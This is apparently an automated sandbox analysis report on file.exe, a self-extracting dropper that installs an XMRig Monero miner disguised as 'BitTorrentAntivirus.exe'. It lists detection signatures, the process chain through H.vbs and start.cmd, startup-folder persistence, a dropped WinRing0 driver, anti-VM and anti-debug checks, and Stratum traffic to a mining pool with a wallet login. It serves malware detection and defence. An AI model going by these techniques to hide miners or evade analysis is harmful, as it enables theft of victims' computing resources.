Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	861727
MD5:	4c23a75127969f41341ae122e46f86e6
SHA1:	3832a0bf804d20a189e81f1f38592c83f5ce6b0a
SHA256:	fd975f721676ab06f6158d4999c83e97a8946059f0b4b0bbc3919eec67f220ea
Tags:	exe
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Xmrig cryptocurrency miner

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Sigma detected: Drops script at startup location

Multi AV Scanner detection for dropped file

Detected VMProtect packer

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Found strings related to Crypto-Mining

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Detected Stratum mining protocol

Machine Learning detection for sample

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Contains functionality to communicate with device drivers

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

File is packed with WinRar

Detected TCP or UDP traffic on non-standard ports

Creates driver files

Creates a start menu entry (Start Menu\Programs\Startup)

PE file contains more sections than normal

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

file.exe (PID: 1304 cmdline: C:\Users\user\Desktop\file.exe MD5: 4C23A75127969F41341AE122E46F86E6)

wscript.exe (PID: 6704 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\H.vbs" MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 6800 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\start.cmd" " MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

BitTorrentAntivirus.exe (PID: 6912 cmdline: BitTorrentAntivirus.exe MD5: 686986CF6A5FD23DE42A436BF83F78D3)

wscript.exe (PID: 6900 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\H.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

cmd.exe (PID: 6984 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\start.cmd" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

BitTorrentAntivirus.exe (PID: 2764 cmdline: BitTorrentAntivirus.exe MD5: 686986CF6A5FD23DE42A436BF83F78D3)

svchost.exe (PID: 7008 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7032 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

wermgr.exe (PID: 3156 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "580" "2100" "1976" "2020" "0" "0" "2248" "0" "0" "0" "0" "0" MD5: FF214585BF10206E21EA8EBA202FACFD)

svchost.exe (PID: 4280 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4648 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6872 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\pool_mine_example.cmd	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x378:$s03: -o pool.
C:\ProgramData\config.json	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000004.00000003.290546847.00000204E0298000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000004.00000002.599232877.00000204E024C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000003.00000002.599501597.000001BCB717A000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000004.00000002.599038191.00000204DE955000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: conhost.exe PID: 6760	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: BitTorrentAntivirus.exe PID: 6912	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 1 entries

Sigma Signatures

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 1304, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H.vbs.lnk

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 51%
Source: file.exe	Virustotal: Detection: 69%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\ProgramData\benchmark_10M.cmd	Avira: detection malicious, Label: PUA/CoinMiner.XK
Source: C:\ProgramData\BitTorrentAntivirus.exe	Avira: detection malicious, Label: HEUR/AGEN.1324411
Source: C:\ProgramData\benchmark_1M.cmd	Avira: detection malicious, Label: PUA/CoinMiner.UM
Source: C:\ProgramData\rtm_ghostrider_example.cmd	Avira: detection malicious, Label: PUA/CoinMiner.MB

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\BitTorrentAntivirus.exe	ReversingLabs: Detection: 70%
Source: C:\ProgramData\BitTorrentAntivirus.exe	Virustotal: Detection: 60%			Perma Link

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\ProgramData\BitTorrentAntivirus.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000003.290546847.00000204E0298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.599232877.00000204E024C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.599501597.000001BCB717A000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.599038191.00000204DE955000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 6760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitTorrentAntivirus.exe PID: 6912, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\config.json, type: DROPPED

Found strings related to Crypto-Mining

Source: conhost.exe, 00000003.00000002.599320919.000001BCB58D0000.00000002.00000001.00040000.00000000.sdmp

String found in binary or memory: XMRig 6.19.1stem32\cmd.exe

Detected Stratum mining protocol

Source: global traffic

TCP traffic: 192.168.2.3:49699 -> 141.94.96.71:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"43vy1qxhkdgumeamrnm2fk8asnwsnmmm3ikvpnqppe1za5fa3tx6auvrkekfvk7xmrbsgjo7wld87dnaq8etexvn6zjynfr","pass":"love","agent":"xmrig/6.19.1 (windows nt 10.0; win64; x64) libuv/1.44.2 gcc/11.2.0","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.0.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E6A7E7 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00E6A7E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7BB70 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00E7BB70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8ADB8 FindFirstFileExA,	0_2_00E8ADB8

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: Joe Sandbox View

IP Address: 141.94.96.71 141.94.96.71

Source: global traffic

TCP traffic: 192.168.2.3:49699 -> 141.94.96.71:3333

Source: WinRing0x64.sys.0.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: WinRing0x64.sys.0.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: WinRing0x64.sys.0.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: WinRing0x64.sys.0.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: svchost.exe, 0000000E.00000003.509371306.000001F474C31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: pool_mine_example.cmd.0.dr	String found in binary or memory: https://miningpoolstats.stream/monero
Source: rtm_ghostrider_example.cmd.0.dr	String found in binary or memory: https://miningpoolstats.stream/raptoreum
Source: svchost.exe, 0000000E.00000003.509371306.000001F474C31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000E.00000003.509371306.000001F474C31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000E.00000003.509371306.000001F474C31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen

Source: unknown

DNS traffic detected: queries for: pool.supportxmr.com

System Summary

Detected VMProtect packer

Source: BitTorrentAntivirus.exe.0.dr

Static PE information: .vmp0 and .vmp1 section names

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\ProgramData\pool_mine_example.cmd, type: DROPPED

Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E68709	0_2_00E68709
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E76887	0_2_00E76887
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8009A	0_2_00E8009A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E6C017	0_2_00E6C017
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E6E147	0_2_00E6E147
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E772FF	0_2_00E772FF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E63206	0_2_00E63206
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E81218	0_2_00E81218
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8D35E	0_2_00E8D35E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E91464	0_2_00E91464
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E80596	0_2_00E80596
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E6E57B	0_2_00E6E57B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E6276D	0_2_00E6276D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E809AE	0_2_00E809AE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E84A0A	0_2_00E84A0A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E73A02	0_2_00E73A02
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E6EB7B	0_2_00E6EB7B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E76CBC	0_2_00E76CBC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E73C7D	0_2_00E73C7D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E6FC43	0_2_00E6FC43
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E84C39	0_2_00E84C39
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E80DE3	0_2_00E80DE3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8CEB0	0_2_00E8CEB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E65EBC	0_2_00E65EBC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E75EB8	0_2_00E75EB8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E6EFEF	0_2_00E6EFEF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E63FFE	0_2_00E63FFE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E73FAE	0_2_00E73FAE

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00E7E630 appears 54 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00E7EFB0 appears 31 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00E7E554 appears 35 times

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E671E6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00E671E6

Source: file.exe, 00000000.00000003.256263856.0000000007855000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameEXPLORER.EXElJ vs file.exe

Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dxgidebug.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\ProgramData\WinRing0x64.sys

Jump to behavior

Source: BitTorrentAntivirus.exe.0.dr

Static PE information: Number of sections : 13 > 10

Source: Joe Sandbox View

Dropped File: C:\ProgramData\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: file.exe	ReversingLabs: Detection: 51%
Source: file.exe	Virustotal: Detection: 69%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\H.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\start.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\BitTorrentAntivirus.exe BitTorrentAntivirus.exe
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\H.vbs"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\start.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\BitTorrentAntivirus.exe BitTorrentAntivirus.exe
Source: unknown	Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "580" "2100" "1976" "2020" "0" "0" "2248" "0" "0" "0" "0" "0"
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\H.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\start.cmd" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\BitTorrentAntivirus.exe BitTorrentAntivirus.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\start.cmd" "	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: H.vbs.lnk.0.dr

LNK file: ..\..\..\..\..\..\..\..\..\ProgramData\H.vbs

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H.vbs.lnk

Jump to behavior

Source: C:\Windows\System32\wermgr.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER4896.tmp

Jump to behavior

Source: WinRing0x64.sys.0.dr

Binary string: \Device\WinRing0_1_2_0

Source: classification engine

Classification label: mal100.expl.evad.mine.winEXE@21/24@1/1

Source: C:\Users\user\Desktop\file.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E66EA8 GetLastError,FormatMessageW,

0_2_00E66EA8

Source: C:\Windows\System32\wermgr.exe	Mutant created: \BaseNamedObjects\Local\SM0:3156:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_01

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E7A07C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00E7A07C

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\H.vbs"

Source: C:\Users\user\Desktop\file.exe	Command line argument: sfxname	0_2_00E7D891
Source: C:\Users\user\Desktop\file.exe	Command line argument: sfxstime	0_2_00E7D891
Source: C:\Users\user\Desktop\file.exe	Command line argument: STARTDLG	0_2_00E7D891
Source: C:\Users\user\Desktop\file.exe	Command line argument: xj	0_2_00E7D891

Source: C:\ProgramData\BitTorrentAntivirus.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\ProgramData\BitTorrentAntivirus.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 8293685 > 1048576

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.0.dr

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7E554 push eax; ret		0_2_00E7E572
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7EFF6 push ecx; ret		0_2_00E7F009

Source: file.exe	Static PE information: section name: .didat
Source: BitTorrentAntivirus.exe.0.dr	Static PE information: section name: .xdata
Source: BitTorrentAntivirus.exe.0.dr	Static PE information: section name: .vmp0
Source: BitTorrentAntivirus.exe.0.dr	Static PE information: section name: .vmp1

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp1

Source: C:\Users\user\Desktop\file.exe

File created: C:\ProgramData\__tmp_rar_sfx_access_check_5034421

Jump to behavior

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\file.exe

File created: C:\ProgramData\WinRing0x64.sys

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\WinRing0x64.sys			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\BitTorrentAntivirus.exe			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\WinRing0x64.sys			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\BitTorrentAntivirus.exe			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H.vbs.lnk

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H.vbs.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\ProgramData\BitTorrentAntivirus.exe	Memory written: PID: 6912 base: 7FFC32240008 value: E9 7B A9 EA FF			Jump to behavior
Source: C:\ProgramData\BitTorrentAntivirus.exe	Memory written: PID: 6912 base: 7FFC320EA980 value: E9 90 56 15 00			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BitTorrentAntivirus.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BitTorrentAntivirus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BitTorrentAntivirus.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BitTorrentAntivirus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BitTorrentAntivirus.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\ProgramData\BitTorrentAntivirus.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\ProgramData\BitTorrentAntivirus.exe	RDTSC instruction interceptor: First address: 00007FF65DFAAFEC second address: 00007FF65DFAAFF0 instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop ebx 0x00000004 rdtsc
